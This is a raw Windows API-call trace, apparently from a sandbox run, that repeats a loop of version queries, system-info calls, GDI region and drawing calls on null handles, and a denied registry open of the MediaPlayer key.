DeleteObject (ho=0x12040713) returned 1 [0017.746] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0017.746] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0017.746] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0017.746] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0017.746] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0017.746] BeginPath (hdc=0x0) returned 0 [0017.746] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0017.746] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0017.746] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0017.746] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0017.746] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0017.746] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0017.746] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0017.746] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0017.746] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0x904027d [0017.746] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0x13040713 [0017.746] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040cf1 [0017.746] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040cf2 [0017.746] CombineRgn (hrgnDst=0x1040cf1, hrgnSrc1=0x904027d, hrgnSrc2=0x13040713, iMode=1) returned 1 [0017.746] CombineRgn (hrgnDst=0x1040cf2, hrgnSrc1=0x904027d, hrgnSrc2=0x13040713, iMode=4) returned 2 [0017.746] CreateSolidBrush (color=0xff) returned 0x2100cf0 [0017.746] CreateSolidBrush (color=0xff0000) returned 0x1100cf3 [0017.747] DeleteObject (ho=0x1100cf3) returned 1 [0017.747] DeleteObject (ho=0x13040713) returned 1 [0017.747] DeleteObject (ho=0x904027d) returned 1 [0017.747] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0017.747] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0017.747] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0017.747] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0017.747] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0017.747] BeginPath (hdc=0x0) returned 0 [0017.747] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0017.747] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0017.747] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0017.747] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0017.747] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0017.747] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0017.747] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0017.747] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0017.747] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0x14040713 [0017.748] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0xa04027d [0017.748] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040cf4 [0017.748] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040cf5 [0017.748] CombineRgn (hrgnDst=0x1040cf4, hrgnSrc1=0x14040713, hrgnSrc2=0xa04027d, iMode=1) returned 1 [0017.748] CombineRgn (hrgnDst=0x1040cf5, hrgnSrc1=0x14040713, hrgnSrc2=0xa04027d, iMode=4) returned 2 [0017.748] CreateSolidBrush (color=0xff) returned 0x2100cf3 [0017.748] CreateSolidBrush (color=0xff0000) returned 0x1100cf6 [0017.748] DeleteObject (ho=0x1100cf6) returned 1 [0017.748] DeleteObject (ho=0xa04027d) returned 1 [0017.748] DeleteObject (ho=0x14040713) returned 1 [0017.748] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0017.748] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0017.748] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0017.748] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0017.748] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0017.748] BeginPath (hdc=0x0) returned 0 [0017.748] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0017.748] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0017.748] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0017.748] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0017.748] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0017.748] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0017.748] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0017.748] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0017.748] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0xb04027d [0017.748] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0x15040713 [0017.748] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040cf7 [0017.748] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040cf8 [0017.749] CombineRgn (hrgnDst=0x1040cf7, hrgnSrc1=0xb04027d, hrgnSrc2=0x15040713, iMode=1) returned 1 [0017.749] CombineRgn (hrgnDst=0x1040cf8, hrgnSrc1=0xb04027d, hrgnSrc2=0x15040713, iMode=4) returned 2 [0017.749] CreateSolidBrush (color=0xff) returned 0x2100cf6 [0017.749] CreateSolidBrush (color=0xff0000) returned 0x1100cf9 [0017.749] DeleteObject (ho=0x1100cf9) returned 1 [0017.749] DeleteObject (ho=0x15040713) returned 1 [0017.749] DeleteObject (ho=0xb04027d) returned 1 [0017.749] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0017.749] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0017.749] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0017.749] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0017.749] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0017.749] BeginPath (hdc=0x0) returned 0 [0017.749] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0017.749] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0017.749] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0017.749] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0017.749] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0017.749] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0017.749] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0017.749] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0017.749] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0x16040713 [0017.749] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0xc04027d [0017.749] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040cfa [0017.749] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040cfb [0017.749] CombineRgn (hrgnDst=0x1040cfa, hrgnSrc1=0x16040713, hrgnSrc2=0xc04027d, iMode=1) returned 1 [0017.749] CombineRgn (hrgnDst=0x1040cfb, hrgnSrc1=0x16040713, hrgnSrc2=0xc04027d, iMode=4) returned 2 [0017.749] CreateSolidBrush (color=0xff) returned 0x2100cf9 [0017.749] CreateSolidBrush (color=0xff0000) returned 0x1100cfc [0017.749] DeleteObject (ho=0x1100cfc) returned 1 [0017.749] DeleteObject (ho=0xc04027d) returned 1 [0017.750] DeleteObject (ho=0x16040713) returned 1 [0017.750] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0017.750] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0017.750] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0017.750] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0017.750] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0017.750] BeginPath (hdc=0x0) returned 0 [0017.750] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0017.750] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0017.750] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0017.750] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0017.750] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0017.750] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0017.750] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0017.750] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0017.750] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0xd04027d [0017.750] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0x17040713 [0017.750] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040cfd [0017.750] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040cfe [0017.750] CombineRgn (hrgnDst=0x1040cfd, hrgnSrc1=0xd04027d, hrgnSrc2=0x17040713, iMode=1) returned 1 [0017.750] CombineRgn (hrgnDst=0x1040cfe, hrgnSrc1=0xd04027d, hrgnSrc2=0x17040713, iMode=4) returned 2 [0017.751] CreateSolidBrush (color=0xff) returned 0x2100cfc [0017.751] CreateSolidBrush (color=0xff0000) returned 0x1100cff [0017.751] DeleteObject (ho=0x1100cff) returned 1 [0017.751] DeleteObject (ho=0x17040713) returned 1 [0017.751] DeleteObject (ho=0xd04027d) returned 1 [0017.751] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0017.751] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0017.751] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0017.751] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0017.751] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0017.751] BeginPath (hdc=0x0) returned 0 [0017.751] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0017.751] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0017.751] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0017.751] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0017.751] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0017.751] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0017.751] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0017.751] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0017.751] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0x18040713 [0017.751] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0xe04027d [0017.751] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040d00 [0017.751] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040d01 [0017.751] CombineRgn (hrgnDst=0x1040d00, hrgnSrc1=0x18040713, hrgnSrc2=0xe04027d, iMode=1) returned 1 [0017.751] CombineRgn (hrgnDst=0x1040d01, hrgnSrc1=0x18040713, hrgnSrc2=0xe04027d, iMode=4) returned 2 [0017.751] CreateSolidBrush (color=0xff) returned 0x2100cff [0017.751] CreateSolidBrush (color=0xff0000) returned 0x1100d02 [0017.752] DeleteObject (ho=0x1100d02) returned 1 [0017.752] DeleteObject (ho=0xe04027d) returned 1 [0017.752] DeleteObject (ho=0x18040713) returned 1 [0017.752] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0017.752] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0017.752] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0017.752] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0017.752] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0017.752] BeginPath (hdc=0x0) returned 0 [0017.752] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0017.752] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0017.752] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0017.752] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0017.752] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0017.752] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0017.752] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0017.752] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0017.752] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0xf04027d [0017.752] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0x19040713 [0017.752] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040d03 [0017.752] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040d04 [0017.752] CombineRgn (hrgnDst=0x1040d03, hrgnSrc1=0xf04027d, hrgnSrc2=0x19040713, iMode=1) returned 1 [0017.752] CombineRgn (hrgnDst=0x1040d04, hrgnSrc1=0xf04027d, hrgnSrc2=0x19040713, iMode=4) returned 2 [0017.752] CreateSolidBrush (color=0xff) returned 0x2100d02 [0017.752] CreateSolidBrush (color=0xff0000) returned 0x1100d05 [0017.752] DeleteObject (ho=0x1100d05) returned 1 [0017.752] DeleteObject (ho=0x19040713) returned 1 [0017.752] DeleteObject (ho=0xf04027d) returned 1 [0017.753] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0017.753] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0017.753] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0017.753] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0017.753] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0017.753] BeginPath (hdc=0x0) returned 0 [0017.753] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0017.753] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0017.753] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0017.753] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0017.753] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0017.753] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0017.753] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0017.753] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0017.753] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0x1a040713 [0017.753] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0x1004027d [0017.753] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040d06 [0017.753] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040d07 [0017.753] CombineRgn (hrgnDst=0x1040d06, hrgnSrc1=0x1a040713, hrgnSrc2=0x1004027d, iMode=1) returned 1 [0017.753] CombineRgn (hrgnDst=0x1040d07, hrgnSrc1=0x1a040713, hrgnSrc2=0x1004027d, iMode=4) returned 2 [0017.753] CreateSolidBrush (color=0xff) returned 0x2100d05 [0017.753] CreateSolidBrush (color=0xff0000) returned 0x1100d08 [0017.753] DeleteObject (ho=0x1100d08) returned 1 [0017.753] DeleteObject (ho=0x1004027d) returned 1 [0017.753] DeleteObject (ho=0x1a040713) returned 1 [0017.753] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0017.753] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0017.754] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0017.754] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0017.754] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0017.754] BeginPath (hdc=0x0) returned 0 [0017.754] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0017.754] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0017.754] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0017.754] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0017.754] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0017.754] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0017.754] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0017.754] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0017.754] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0x1104027d [0017.754] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0x1b040713 [0017.754] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040d09 [0017.754] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040d0a [0017.754] CombineRgn (hrgnDst=0x1040d09, hrgnSrc1=0x1104027d, hrgnSrc2=0x1b040713, iMode=1) returned 1 [0017.754] CombineRgn (hrgnDst=0x1040d0a, hrgnSrc1=0x1104027d, hrgnSrc2=0x1b040713, iMode=4) returned 2 [0017.754] CreateSolidBrush (color=0xff) returned 0x2100d08 [0017.754] CreateSolidBrush (color=0xff0000) returned 0x1100d0b [0017.754] DeleteObject (ho=0x1100d0b) returned 1 [0017.754] DeleteObject (ho=0x1b040713) returned 1 [0017.754] DeleteObject (ho=0x1104027d) returned 1 [0017.754] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0017.754] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0017.754] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0017.754] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0017.754] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0017.755] BeginPath (hdc=0x0) returned 0 